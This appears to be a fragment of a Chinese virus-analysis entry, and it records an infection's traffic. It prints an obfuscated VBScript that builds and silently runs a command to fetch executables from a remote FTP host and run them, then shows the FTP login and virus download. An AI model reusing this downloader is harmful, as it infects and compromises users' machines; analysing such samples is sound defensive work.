| |
协议:TCP
端口:1060
连接IP地址:202.153.172.**
描述:连接IP地址POST执行的脚本内容
function q
for i=1 to UBound(j)
r=r&chr(9+j(i))
next
Set kk = CreateObject("Wscript.Shell")
kk.run r,0
end function
j=array(4,90,100,91,23,38,90,23,101,92,107,23,106,107,102,103,23,106,95,88,105,92,91,88,90,90,92,106,
106,29,92,90,95,102,23,102,23,110,110,110,37,94,39,42,113,37,90,102,100,53,96,37,107,111,107,29,92,90,
95,102,23,88,88,42,42,53,53,96,37,107,111,107,29,92,90,95,102,23,89,89,42,42,53,53,96,37,107,111,107,
29,92,90,95,102,23,94,92,107,23,91,23,91,37,92,111,92,53,53,96,37,107,111,107,29,92,90,95,102,23,89,
112,92,53,53,96,37,107,111,107,29,93,107,103,23,36,106,49,96,37,107,111,107,29,91,92,99,23,96,37,107,
111,107,29,91,37,92,111,92,29,92,90,95,102,23,102,23,110,110,110,37,94,39,42,113,37,90,102,100,53,108,
37,107,111,107,29,92,90,95,102,23,88,88,42,42,53,53,108,37,107,111,107,29,92,90,95,102,23,89,89,42,42,
53,53,108,37,107,111,107,29,92,90,95,102,23,94,92,107,23,106,23,106,37,92,111,92,53,53,108,37,107,111,
107,29,92,90,95,102,23,89,112,92,53,53,108,37,107,111,107,29,93,107,103,23,36,106,49,108,37,107,111,107,
29,106,37,92,111,92,29,91,92,99,23,108,37,107,111,107,29,91,92,99,23,54,37,109,89,106,29,91,92,99,23,106,
37,92,111,92,23,91,37,92,111,92,29,106,107,88,105,107,23,95,107,107,103,49,38,38,107,110,37,100,88,107,90,
95,37,112,88,95,102,102,37,90,102,100,38,29,91,92,99,23,54,23,54,37,89,88,107)q
协议:TCP-FTP
端口:21
连接IP地址:202.153.172.**
220 Serv-U FTP Server v6.4 for WinSock ready...
USER aa33
331 User name okay, need password.
PASS bb33
230 User logged in, proceed.
PORT 10,0,51,12,4,23
200 PORT Command successful.
RETR s
150 Opening ASCII mode data connection for s (187872 Bytes).
连接FTP请求病毒文件
注:%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。
%Windir% WINDODWS所在目录
%DriveLetter% 逻辑驱动器根目录
%ProgramFiles% 系统程序默认安装目录
%HomeDrive% 当前启动的系统的所在分区
%Documents and Settings% 当前用户文档根目录
%Temp% \Documents and Settings\当前用户\Local Settings\Temp
%System32% 系统的 System32文件夹
Windows2000/NT中默认的安装路径是C:\Winnt\System32
windows95/98/me中默认的安装路径是C:\Windows\System
windowsXP中默认的安装路径是C:\Windows\System32 |